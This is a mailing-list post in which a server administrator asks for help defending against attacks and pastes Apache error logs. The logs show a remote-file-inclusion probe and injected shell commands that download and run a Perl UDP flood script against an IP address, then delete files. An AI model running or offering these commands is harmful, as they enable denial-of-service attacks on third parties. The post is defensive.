Re: Help to defend from DOS web attacks

["Emanuel Marufo" <marufos () gmail com>]

Thanks for your help, i think what my mail was missing.

here is some lines from :


[client 67.15.4.93] PHP Warning:
main(http://www.justforwipe.com/captcha/fonts/.logs/.../vulnrd.txt?/lib/fileUpload.lib.php)
[function.main]: failed to open stream: HTTP request failed! HTTP/1.0
404 Not Found\r\n in
/var/www/html/Claroline/claroline/learnPath/include/scormExport.inc.php
on line 43

[Sat Oct 20 19:18:33 2007] [error] [client 201.160.110.151] File does
not exist: /var/www/html/favicon.ico [Sat Oct 20 19:18:46 2007]
[error] [client 201.160.110.151] (13)Permission denied: access


[Sat Oct 20 21:45:17 2007] [error] [client 74.52.177.153] File does
not exist: /var/www/html/claroline sh: -c: line 0: syntax error near
unexpected token `;' sh: -c: line 0: `cd /tmp;curl -O
http://packetstorm.linuxsecurity.com/DoS/udp.pl;perl udp.pl
89.255.60.144 53 9999999999999999 &;rm -rf *.pl*;' sh: -c: line 0:
syntax error near unexpected token `;' sh: -c: line 0: `cd /tmp;GET
http://packetstorm.linuxsecurity.com/DoS/udp.pl;perl udp.pl
89.255.60.144 53 9999999999999999 &;rm -rf *.pl*;' sh: -c: line 0:
syntax error near unexpected token `;' sh: -c: line 0: `cd /tmp;wget
http://packetstorm.linuxsecurity.com/DoS/udp.pl;perl udp.pl
89.255.60.144 53 9999999999999999 &;rm -rf *.pl*;' sh: -c: line 0:
syntax error near unexpected token `;' sh: -c: line 0: `cd /tmp;fetch
http://packetstorm.linuxsecurity.com/DoS/udp.pl;perl udp.pl
89.255.60.144 53 9999999999999999 &;rm -rf *.pl*;' sh: -c: line 0:
syntax error near unexpected token `;' sh: -c: line 0: `cd /tmp;wget
http://packetstorm.linuxsecurity.com/DoS/udp.pl;perl udp.pl
89.255.60.144 53 9999999999999999 &;rm -rf *.pl*;' sh: -c: line 0:
syntax error near unexpected token `;' sh: -c: line 0: `cd /tmp;curl
-O


etc, etc.

What can i do?

may mod_evasive and tcp syn will be enough?